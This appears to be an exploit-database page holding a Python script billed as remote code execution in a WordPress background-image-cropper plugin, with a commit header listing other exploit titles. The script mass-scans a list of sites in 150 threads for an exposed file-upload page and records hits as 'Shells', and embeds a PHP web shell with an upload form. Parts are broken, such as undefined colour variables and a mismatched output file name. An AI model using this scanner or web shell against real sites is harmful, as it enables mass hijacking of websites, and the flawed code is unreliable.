9eb5c7b425
7 changes to exploits/shellcodes/ghdb Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation FlatPress v1.3 - Remote Command Execution Laravel Framework 11 - Credential Leakage SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution Flowise 1.6.5 - Authentication Bypass
88 lines
No EOL
3.5 KiB
Text
88 lines
No EOL
3.5 KiB
Text
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
|
|
# Date: 2024-04-16
|
|
# Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# Vendor Homepage: https://wordpress.org
|
|
# Software Link: https://wordpress.org/plugins/background-image-cropper/
|
|
# Version: 1.2
|
|
# Category : webapps
|
|
# Tested on: windows 10 , firefox
|
|
|
|
import sys , requests, re
|
|
from multiprocessing.dummy import Pool
|
|
from colorama import Fore
|
|
from colorama import init
|
|
init(autoreset=True)
|
|
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
|
|
"<form method='post' enctype='multipart/form-data'> <input type='file'
|
|
name='zb'><input type='submit' name='upload' value='upload'></form>";
|
|
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
|
|
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
|
|
Upload."; } } ?>"""
|
|
requests.urllib3.disable_warnings()
|
|
headers = {'Connection': 'keep-alive',
|
|
'Cache-Control': 'max-age=0',
|
|
'Upgrade-Insecure-Requests': '1',
|
|
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
|
|
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
|
|
Chrome/60.0.3112.107 Moblie Safari/537.36',
|
|
'Accept':
|
|
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
|
|
'Accept-Encoding': 'gzip, deflate',
|
|
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
|
|
'referer': 'www.google.com'}
|
|
try:
|
|
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
|
|
except IndexError:
|
|
path = str(sys.argv[0]).split('\\')
|
|
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
|
|
|
|
def URLdomain(site):
|
|
if site.startswith("http://") :
|
|
site = site.replace("http://","")
|
|
elif site.startswith("https://") :
|
|
site = site.replace("https://","")
|
|
else :
|
|
pass
|
|
pattern = re.compile('(.*)/')
|
|
while re.findall(pattern,site):
|
|
sitez = re.findall(pattern,site)
|
|
site = sitez[0]
|
|
return site
|
|
|
|
|
|
def FourHundredThree(url):
|
|
try:
|
|
url = 'http://' + URLdomain(url)
|
|
check =
|
|
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
|
|
allow_redirects=True,timeout=15)
|
|
if 'enctype="multipart/form-data" name="uploader"
|
|
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
|
|
type="submit" id="_upl" value="Upload' in check.content:
|
|
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
|
|
open('Shells.txt', 'a').write(url +
|
|
'/wp-content/plugins/background-image-cropper/ups.php\n')
|
|
else:
|
|
url = 'https://' + URLdomain(url)
|
|
check =
|
|
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
|
|
allow_redirects=True,verify=False ,timeout=15)
|
|
if 'enctype="multipart/form-data" name="uploader"
|
|
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
|
|
type="submit" id="_upl" value="Upload' in check.content:
|
|
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
|
|
open('Shells.txt', 'a').write(url +
|
|
'/wp-content/plugins/background-image-cropper/ups.php\n')
|
|
else:
|
|
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
|
|
except :
|
|
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
|
|
|
|
mp = Pool(150)
|
|
mp.map(FourHundredThree, target)
|
|
mp.close()
|
|
mp.join()
|
|
|
|
print '\n [!] {}Saved in LOL.txt'.format(fc) |